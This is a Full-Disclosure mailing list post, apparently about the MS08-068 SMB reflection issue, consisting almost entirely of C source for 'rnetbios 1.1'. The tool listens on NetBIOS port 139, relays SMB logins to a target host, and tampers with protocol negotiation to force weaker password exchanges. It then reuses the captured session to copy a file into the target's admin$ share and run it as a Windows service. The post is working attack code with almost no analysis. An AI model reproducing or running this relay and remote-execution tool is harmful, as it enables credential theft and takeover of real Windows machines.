[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] rnetbios1.1 and about ms08-068



 
 
http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html
 
 
 

#include <windows.h> 
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <winnetwk.h>
#pragma  comment(lib,"ws2_32")
#pragma  comment(lib,"Mpr.lib")

#define  BINDNUM      10
#define  THREADNUM    BINDNUM
#define  SERVERPORT   139
#define  BUFFSIZE     0x4000
typedef struct rserver{
   
 int socketclient;
    int socketserver;
 int socketconnects;
 int socketconnectd;
  
 // struct sockaddr_in iprnetbios;
//  struct sockaddr_in ippsexec;
    SOCKET ipclient;
    SOCKET iprnetbios;
    SOCKET ippsexec;
    SOCKET ipdest;
// BOOL   rself;
//  SOCKET iprnetbios;
} RSERVER;
 
typedef struct rnet{

 int   fd;
 int   fd2;
    int   fd3;
 int   fd4;
 int   long72;
    int   *long72add;
    int   long73ok;
    int   *long73okadd;
 int   recvbytes;
 char *buff;
 char *buff72;
 char *buff73;
 char *buff73ok;
 char *filename;
    char *namereq;
    char *namereturn;
 char *ipbuff;
 char *namebuff;
    char *buffgetname;
    char *buff0x82;

 BOOL loginok;

} RNET;
typedef struct psinfo{
   
 char *ip;
 char *filename;
}PSINFO;
 

void   psexec(PSINFO *psinfo);
void   rnetbios(RSERVER *rinfo);
void   rnetbiosthread(void *rinfo );
void   nameuncode(char *namebuff,char *ipbuff);
void   changepass(char *buff,char *buff73);
int    waitfd4(RNET *rnetinfo,RSERVER *rinfoadd);
BOOL   rnetchangepacket(RNET *rnetinfo);
BOOL   rnetchangepacket2(RNET *rnetinfo);

int    newsend(int fd,char *buff,int size,int flag);
int main(int argc, char **argv)
{
  RSERVER  rinfo[THREADNUM];
  int      fd2;
  int      fd3[BINDNUM];
  struct   sockaddr_in s_in1,s_in2,s_in3,s_in4;
  struct   hostent *he;
  int      i;  //,randnum;   
  int      result;
  BOOL     loginhimself;
  SOCKET   d_ip,bindip;
  
  WSADATA  wsaData;
  DWORD    ThreadID; 
  
    printf("\n rnetbios ver 1.1.");
 printf("\n copy by yuange 2000.4.7.");
 printf("\n rcopy 2002.10.14.");
 printf("\n welcome to my homepage http://yuange.yeah.net.";);
 printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] 
[rnetbios client ip][new can netbios ip]",argv[0]);
 printf("\n example:%s 0 192.168.5.9 192.168.6.9 192.168.7.9",argv[0]);  
// printf("\n when somebody file:\\yourip,your host will rnetbios to the [ip] 
\n or his source ip if you haven't specified [ip] address");
// printf("\n After he login ,you can file:\\127.0.0.1 to the [ip] .\n ");
 //   psexec(1);
    if(argc<5){
  printf("\n error!\n");
      printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind 
ip2] [rnetbios client ip][new can netbios ip]",argv[0]);
     printf("\n\n");
  exit(1);
    }

    result= WSAStartup(MAKEWORD(1, 1), &wsaData);
    if (result != 0) {
  fprintf(stderr, "Your computer was not connected "
   "to the Internet at the time that "
   "this program was launched, or you "
   "do not have a 32-bit "
   "connection to the Internet.");
  exit(2);
 }
/*
  for(i=0,j=0;i<16;++i){
         name=servername[i] ;
       if(name==0) j=1;
       if(j==1) name=0x20;
       namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
       namebuff[2*i+6]= (name & 0x000F) + 'A';
 }
    namebuff[37]=0; 
*/
    d_ip=-1;
    d_ip = inet_addr(argv[1]);
    if(d_ip==-1){
          he = gethostbyname(argv[1]); 
       if(!he)  printf("\n Can't get the ip of %s !\n",argv[1]); //server);
          else     memcpy(&d_ip, he->h_addr, sizeof(d_ip));
 }  
 
 if(d_ip==0) d_ip=-1;
 if(d_ip==-1){
  loginhimself=1;
  printf("\n rnetbios to the netbios ip.");
 }
 else   {
  loginhimself=0;
  printf("\n rnetbios to %s",argv[1]); //server);
 }
  s_in1.sin_addr.s_addr=d_ip;
    fd2 = socket(AF_INET, SOCK_STREAM,0);
    s_in2.sin_family = AF_INET;
    s_in2.sin_port = htons(SERVERPORT);
    s_in2.sin_addr.s_addr = 0;
    s_in2.sin_addr.s_addr = inet_addr(argv[2]);
 if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){
       printf("\n\n argv[2] ip error. use the ip: 192.168.0.2");
       s_in2.sin_addr.s_addr = inet_addr("192.168.0.2");
    }
 i=bind(fd2,&s_in2, sizeof(s_in2));
    if(i<0){
   i=WSAGetLastError();
      printf("\n bind error 0x%x",i);
      exit(1);
    }
 
 i=listen(fd2,100); 
    if(i<0){
   i=WSAGetLastError();
      printf("\n bind error 0x%x",i);
      exit(1);
    }
 
    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(SERVERPORT);
    s_in3.sin_addr.s_addr = 0;
    s_in3.sin_addr.s_addr = inet_addr(argv[3]);
 if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){
       printf("\n\n argv[3] ip error. use the ip: 192.168.0.3");
       s_in3.sin_addr.s_addr = inet_addr("192.168.0.3");
    }
    
 bindip=s_in3.sin_addr.s_addr;
 for(i=0;i<BINDNUM;++i){
       fd3[i] = socket(AF_INET, SOCK_STREAM,0);
    bind(fd3[i],&s_in3, sizeof(s_in3));
    listen(fd3[i],10); 
       s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1);
    }
 
 s_in4.sin_addr.s_addr = 0;
    s_in4.sin_addr.s_addr = inet_addr(argv[4]);
 if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){
       printf("\n\n argv[4] ip error. use the ip: 192.168.0.4");
       s_in4.sin_addr.s_addr = inet_addr("192.168.0.4");
    }

    for(i=0;i<THREADNUM;++i){
 
  rinfo[i].socketclient=fd2;
  rinfo[i].socketserver=fd3[i];
  rinfo[i].ipclient=s_in2.sin_addr.s_addr;
  rinfo[i].iprnetbios=ntohl(htonl(bindip)+i);
  rinfo[i].ippsexec=s_in4.sin_addr.s_addr;
  rinfo[i].ipdest=d_ip;
     
CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID);
  

 } 
 Sleep(0x7fffffff);
  //  closesocket(fd1);
    closesocket(fd2);
 //   closesocket(fd3);
 //   closesocket(fd4);
    WSACleanup( );
    return(0); 
}
 
 void psexec(PSINFO *info) 
 {
  /*
   SECURITY_ATTRIBUTES sa;
   PROCESS_INFORMATION ProcessInformation;
   HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;   
   STARTUPINFO siinfo;
   
*/
   PSINFO  psinfo=*info;
   NETRESOURCE lpNetResource;
   int  fd1,i;
 //  char *ip2;
   char cmdstr[0x100];
   char res[0x100];
   char filename[0x100];
   char tempfilename[0x100];
   char ser[0x100];
//   char *name="cc.exe";
   char *user="Administrator";
   char *pass="test";
   SC_HANDLE scm,svc; 
   char *cmdstrformat="psexec.exe \\\\%s -u Administrator -p test -s cmd.exe";
//   char *cmdstrformat="\\\\%s\\admin$ ";
 //  fd1=*(int *)(ip);
 //   ip2=*(int *)(ip+4)+8;
  // ip2="192.168.70.29";
   wsprintf(cmdstr,cmdstrformat,psinfo.ip);  //"127.0.0.1");   //
   GetTempPath(0x100,tempfilename);
   GetTempFileName(tempfilename,NULL,NULL,tempfilename);
   DeleteFile(tempfilename);
   for(i=strlen(tempfilename);i>0;--i){
    if(tempfilename[i]=='\\')
    {
     strcpy(tempfilename,tempfilename+i+1);
           break;
    }
   }
  // system(cmdstr);
  // ExitThread(0);
   wsprintf(res,"\\\\%s\\admin$",psinfo.ip);  
   wsprintf(filename,"\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename);  
   wsprintf(ser,"\\\\%s",psinfo.ip);  
  lpNetResource.dwScope=RESOURCE_CONNECTED;
  lpNetResource.dwType =RESOURCETYPE_DISK;
  lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
  lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
  lpNetResource.lpLocalName=NULL;
  lpNetResource.lpRemoteName=res;
  lpNetResource.lpComment=NULL;
  lpNetResource.lpProvider=NULL;

  i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE);
  scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE);
  printf("\n scm=0x%x err=0x%x ip=%s",scm,GetLastError(),psinfo.ip);
  svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, 
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE,
 tempfilename,NULL,NULL,NULL,NULL,NULL);
  if(svc==NULL)  svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS);
  printf("\n svc=0x%x err=0x%x",svc,GetLastError());
  i=CopyFile(psinfo.filename,filename,TRUE);
  printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip);

  i=StartService(svc,0,NULL);
  printf("\n i=0x%x error=0x%x",i,GetLastError());
  i=DeleteService(svc);
  DeleteFile(filename);
 

  // printf("\n cmdstr=%s\n",cmdstr);
   /*
         sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;
 
            CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

    ZeroMemory(&siinfo,sizeof(siinfo));
     
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
// 
CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
            
  */
  //  system(cmdstr);

 //  printf("\n psexec end. closesocket fd1=0x%x",fd1);
  
   CloseServiceHandle(scm);
   CloseServiceHandle(svc);
 //  closesocket(fd1);
 //  closesocket(fd2); 
   i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE);
   ExitThread(0);
   printf("\n Exitthread erro1 !");
   return;
 }

void  rnetbiosthread(RSERVER *rinfoadd)
{
      
   RSERVER rinfo;
      int i,fd1,fd2;
      struct sockaddr_in s_in1,s_in2;
      SOCKET dip;
      rinfo=*rinfoadd;
     // memcpy(&rinfo,rinfoadd,sizeof(rinfo));
   dip=rinfo.ipdest;
   while(1)
   {
         i=sizeof(struct sockaddr);
      fd1=accept(rinfo.socketclient,&s_in1,&i);
   if(s_in1.sin_addr.s_addr!=rinfo.ipclient)
         {
 
    if(rinfo.ipdest==-1) dip=s_in1.sin_addr.s_addr;
             fd2 = socket(AF_INET, SOCK_STREAM,0);
             s_in2.sin_family = AF_INET;
             s_in2.sin_port = htons(SERVERPORT);
             s_in2.sin_addr.s_addr = dip;
             printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
          if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct 
sockaddr_in)))
    {

                 printf("\n Connect %s ok!",inet_ntoa(s_in2.sin_addr));
                 rinfo.socketconnects=fd1;
     rinfo.socketconnectd=fd2;
     
     rnetbios(&rinfo);
   //  printf("\n rnetbios return");
    }
    else  printf("\n Connect %s error!",inet_ntoa(s_in2.sin_addr));
    closesocket(fd2);
   }
   closesocket(fd1);
   }
   
   ExitThread(1);
  
}
 void  rnetbios(RSERVER *rinfoadd)
 {
  
  RNET      rnetinfo;
  RSERVER   rinfo=*rinfoadd;
//  PSINFO  psinfo; 
  int     fd,fd2,fd3,fd4;
  struct  sockaddr_in s_in1,s_in2,s_in4;

  char buff[BUFFSIZE+1];
  char buff72[BUFFSIZE+1];
  char buff73[BUFFSIZE+1];
  char buff73ok[BUFFSIZE+1];
  char filename[BUFFSIZE+1];
  char buff0x82[]={0x82,0,0,0};
  char namereq[]={0x81,0,0,0};
 // int  long72=0;
 
  u_short  name;
  char 
buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41
   
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
  char 
namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46
   
,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00
   
,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41
   ,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00
   };
  char ipbuff[0x100];
  char namereturn[]={0x82,0,0,0,0,0};
 
  struct sockaddr addr2;
  int i,j,k,exitcode;
  //,k,l,ii;
 // int usernameaddress1;
 // int usernameaddress2;
 
  
 // int  strflg1,strflg2;
  DWORD       ThreadID;
  HANDLE      threadhandle=0;
  
 // BOOL     loginok;

        s_in1.sin_addr.s_addr=rinfo.iprnetbios;
  wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
        nameuncode(namebuff,ipbuff);
       
      fd=fd2;
        fd2=rinfo.socketconnects;
     fd3=rinfo.socketconnectd;
        fd4=0;
  rnetinfo.fd2=fd2;
  rnetinfo.fd3=fd3;
  rnetinfo.fd4=fd4;
        rnetinfo.buff=buff;
  rnetinfo.buff72=buff72;
  rnetinfo.buff73=buff73;
        rnetinfo.buff73ok=buff73ok;
  rnetinfo.filename=filename;
  rnetinfo.buffgetname=buffgetname;
  rnetinfo.ipbuff=ipbuff;
  rnetinfo.namebuff=namebuff;
        rnetinfo.buff0x82=buff0x82;
        rnetinfo.namereq=namereq;
  rnetinfo.long72add=&rnetinfo.long72;
  rnetinfo.long72=0;
     rnetinfo.long73okadd=&rnetinfo.long73ok;
  rnetinfo.long73ok=0;
     rnetinfo.loginok=FALSE;

 //     printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
      i = 1;
         ioctlsocket(fd2, FIONBIO, &i);
   i = 1;
         ioctlsocket(fd3, FIONBIO, &i);
      
   i = 1;
         ioctlsocket(rinfo.socketserver, FIONBIO, &i);
      
   
   ThreadID=0;
            memset(buff,0,BUFFSIZE);
   memset(filename,0,BUFFSIZE);
   while(1)
   {
    if(rnetinfo.loginok==TRUE)
    {
                    i=GetExitCodeThread(threadhandle,&exitcode);
     if(i==1&&exitcode!=STILL_ACTIVE){
        // printf("\n psexec exit 0x%x code",exitcode);
         break;
     }
    }
       Sleep(5);
               
           //  if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0);
    i=recv(fd,buff,BUFFSIZE,0);
    if(i<=0&&WSAGetLastError()==0x2746) {
      //  printf("\n recv fd 0x%x bytes. error=0x2746",i);
     break;
                }
    if(i>0)
    {
     rnetinfo.recvbytes=i;
     if(rnetchangepacket(&rnetinfo)==TRUE)
                    {
                        threadhandle=waitfd4(&rnetinfo,&rinfo); 
       
     }
                    memset(buff,0,BUFFSIZE);
                
    }

                
             i=recv(fd3,buff,BUFFSIZE,0);
             if(i<=0&&WSAGetLastError()==0x2746) {
       //    printf("\n recv fd3 0x%x bytes. error=0x2746",i);
     break;
                }
          if(i>0)
    {
         rnetinfo.recvbytes=i; 
           if(rnetchangepacket2(&rnetinfo)==TRUE)
      {
                            threadhandle=waitfd4(&rnetinfo,&rinfo); 
       
      }
                        memset(buff,0,BUFFSIZE);
                            
    }
    if(rnetinfo.loginok==FALSE) fd=fd2;
    else                        fd=rnetinfo.fd4;
                rnetinfo.fd=fd;

   }

            closesocket(fd2);
   closesocket(fd3);
            closesocket(rnetinfo.fd4);
   CloseHandle(threadhandle);
         return;
}
 
 
 

void nameuncode(char *namebuff,char *ipbuff)
{
 int i,j;
    u_short  name;
    char servername[]={"*SMBSERVER"};
 for(i=0,j=0;i<16;++i){
         name=ipbuff[i];  //servername[i] ;
       if(name==0) j=1;
       if(j==1) name=0x20;
       namebuff[2*i+0x27]= ( (name >> 4) & 0x000F ) + 'A';
       namebuff[2*i+0x28]= (name & 0x000F) + 'A';
 }
 for(i=0,j=0;i<16;++i){
         name=servername[i] ;
       if(name==0) j=1;
       if(j==1) name=0x20;
       namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
       namebuff[2*i+6]= (name & 0x000F) + 'A';
 }
    namebuff[0x25]=0;
 namebuff[0x47]=0;
 return;
}
 

int newsend(int fd,char *buff,int size,int flag)
{
 int j;
    int i = 0;
    ioctlsocket(fd, FIONBIO, &i);
 j=send(fd,buff,size,flag);
    i = 1;
 ioctlsocket(fd, FIONBIO, &i);
    return j; 
}

void  changepass(char *buff11,char *buff7311)
{
 
  char     *buff=*(int *)buff11;
  char     *buff73=*(int *)buff7311;
  int      usernameaddress1;
  int      usernameaddress2;
  int      strflg1,strflg2;   
  u_short  name;    
         memcpy(buff+0x41,buff73+0x41,0x18);
         // copy password
         if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18);
 
         // copy the next password
         strflg1=buff73[0x0f];
         strflg1&=0x80;
         if(strflg1!=0) strflg1=1;
         strflg2=buff[0x0f];
         strflg2&=0x80;
         if(strflg2!=0) strflg2=1;
         //str is unicode ?
         usernameaddress1=0x41+0x18+buff73[0x35]+strflg1;
         usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
         name=1;
         while(name!=0){
         name=buff73[usernameaddress1];
         if(strflg1==0) ++usernameaddress1;
         else usernameaddress1+=2;
         buff[usernameaddress2]=name;
         ++usernameaddress2;
         if(strflg2!=0) {
          ++usernameaddress2;
          buff[usernameaddress2]=0;
         }
         } 
         // copy user name ,不够严谨,不过勉强能用。
}
 
BOOL  rnetchangepacket(RNET *rnetinfoadd)
{
   
  
  char filename[0x100];
  unsigned char name;
     int i,j,k;
     RNET rnetinfo=*rnetinfoadd;
     if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32)
  {
   i=*(WORD *)(rnetinfo.buff+0x41);
   if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0)
   {   
    memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e);
  //  *(int *)(rnetinfo.buff+9)=0xc0000016;
      //       
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
   //       closesocket(rnetinfo.fd2);
    printf("\n get file name ok!");
    return(TRUE);
         }
   if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0)
   {
    memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rnetinfo.recvbytes-0x54);
 //      *(int *)(rnetinfo.buff+9)=0xc0000016;
             
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
 //       closesocket(rnetinfo.fd2);
  
    printf("\n get file name ok!");
    return(TRUE);
   }  
  }
      
     if(rnetinfo.buff[0x8]==0x72)
  {
   if(rnetinfo.loginok==FALSE)
   {
   //  memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
     memset(rnetinfo.buff+0xc,0,4);
                 rnetinfo.long72=rnetinfo.recvbytes;
         //这儿是系统支持什么服务的标记,WIN2000与WINNT系统不一样。
         //有一方是WINNT看一般就是0,而两方都是WIN2000后面协议的密码方式就不一样。
         //设置成0,欺骗让其以WINNT的方式发送加密的密码,以好截获。但可能WIN2000支持不好。
     //   printf("\n fd2 recv smb 0x72  packet ");
   }
   else
   {  
                        memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8);
      memcpy(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72);
      //  printf("\n send smb 0x72 packet .");
      rnetinfo.buff[0x25]=5;
        //run in win9x.the win9x netbios client use 
        //这儿客户端可能要WIN9X,不知道WINT。WIN2000怎么处理。
      newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0);
      return(FALSE);
      rnetinfo.recvbytes=0;
             }
   
  }
     if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
  {
           
   if(rnetinfo.loginok==FALSE)
   {
    if(rnetinfo.buff[0x33]==0x18)
       {
                 memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes); 
             }
    
        i=*(WORD *)(rnetinfo.buff+0x27);
    if(rnetinfo.buff[0x8]==0x75) i=0x20;
             j=*(unsigned char *)(rnetinfo.buff+0x4+i);
    i+=*(WORD *)(rnetinfo.buff+i+0x0b);
    i=i+2*j+7;                 
    memcpy(filename,rnetinfo.buff+i,sizeof(filename));
    j=1;
    if(filename[1]==0) j=2;
             for(i=0,k=0;i<0x100;i+=j,++k)
             {
                   name=filename[i];
                   filename[k]=name;
                             //   if(i==0&&name=='\\') k-=1;
             }
    for(i=strlen(filename);i>0;--i)
    {
                        name=filename[i];
          if(name=='\\')
                        {
           strcpy(filename,filename+i+1);
              break;
      }
    }
            
   
    if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0)
    {
   
        strcpy(rnetinfo.filename,filename);
     printf("\n file name=%s",filename);
  //  closesocket(rnetinfo.fd2);
  //  printf("\n the new get file name ok!");
        return(TRUE);
             } 
         } 
   else{
           
   
      if(rnetinfo.buff[0x33]==0x18)
   {
      //      printf("\n send login ok packet.");
       //     printf("\n send login ok packet.");
       //     newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0);
  // return;
       changepass(&rnetinfo.buff,&rnetinfo.buff73);
                memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2);  //user id
   }
   }
  }
     if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0) 
  {
   if(rnetinfo.loginok==FALSE) 
         {
       rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
       //      printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
         }
   else 
         {
       rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0);
           //  
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
        //     printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
   }
     }
  else
  {
   if(rnetinfo.loginok==FALSE) 
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
         else
   {
  //  memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8);
       
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);  
         } 

    //  printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
 
  }
     return(FALSE);
}
      
 
BOOL  rnetchangepacket2(RNET *rnetinfoadd)
{
  RNET rnetinfo=*rnetinfoadd;      
     if(rnetinfo.buff[0x8]==0x72)
  {
   if(rnetinfo.loginok==FALSE){
     memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
   //  memset(rnetinfo.buff+0xc,0,4);
                 *rnetinfo.long72add=rnetinfo.recvbytes;
     
             }
   
  }
     if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
  {
             if(*(int 
*)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE)
    {
                  memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes);
                  *rnetinfo.long73okadd=rnetinfo.recvbytes;
               //   rnetinfo.loginok=TRUE; 
      //   closesocket(rnetinfo.fd2);
      printf("\n now login ok!");
              // rnetinfo.recvbytes=0;  
   //   return(TRUE);
              }
    
  }

    
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
  {
   //     *(int *)(rnetinfo.buff+9)=0xc0000016;
  }  
  rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0);
     
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
  {
    //  closesocket(rnetinfo.fd2);
      //   return(TRUE);
  }  
      //   printf("\n send fd 0x%x 0x%x 
bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
     return(FALSE);
}
      
int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd)
{
// RNET     rnetinfo=*rnet;
 RSERVER  rinfo=*rinfoadd;
 int i,j,k,threadhandle,exitcode;
 unsigned char name;
 char *ipbuff[0x100];
 PSINFO   psinfo;
    struct  sockaddr_in s_in1,s_in2,s_in4;
    struct sockaddr addr2;
    DWORD       ThreadID;
                             rnetinfo->loginok=TRUE;
                             s_in1.sin_addr.s_addr=rinfo.iprnetbios;
                 wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
                             psinfo.ip=&ipbuff;
/*
        i=*(WORD *)(rnetinfo->buff73+0x27);
                            j=*(unsigned char *)(rnetinfo->buff73+0x4+i);
        i+=*(WORD *)(rnetinfo->buff73+i+0x0b);
        i=i+2*j+7;                 
        psinfo.filename=rnetinfo->buff73+i;
        j=1;
        if(psinfo.filename[1]==0) j=2;
                             for(i=0,k=0;i<0x100;i+=j,++k)
                             {
                                name=psinfo.filename[i];
                                psinfo.filename[k]=name;
                             //   if(i==0&&name=='\\') k-=1;
                             }
        for(i=strlen(psinfo.filename);i>0;--i)
        {
                                  name=psinfo.filename[i];
          if(name=='\\')
                                  {
             strcpy(psinfo.filename,psinfo.filename+i+1);
          break;
                                  }
                             }
*/
   
                    psinfo.filename=rnetinfo->filename;
                             j=1;
        if(rnetinfo->filename[1]==0) j=2;
                             for(i=0,k=0;i<0x100;i+=j,++k)
                             {
                                name=rnetinfo->filename[i];
                                rnetinfo->filename[k]=name;
                                if(i==0&&name=='\\') k-=1;
                             }

        printf("\n filename=%s\n",psinfo.filename);
                 
threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(LPVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID);
      // break;
        while(1){
         Sleep(5);
                                       if(rnetinfo->loginok==TRUE)
            {
                                          
i=GetExitCodeThread(threadhandle,&exitcode);
                           if(i==1&&exitcode!=STILL_ACTIVE){
                    //       printf("\n psexec exit 0x%x code",exitcode);
                           break;
            }
            }
                                  
                                 i=sizeof(struct sockaddr);
                     rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i);
         
                                 memcpy(&s_in4,&addr2,15);
         if(rnetinfo->fd4>0)
         {
          if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){
               printf("\n fd4 error.");
            closesocket(rnetinfo->fd4);
          }
                                     else
          { 
          printf("\n fd4 ok! ip=%s",ipbuff);
          break;
          }
         }
        }
                          
  return(threadhandle);
}
                                          
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/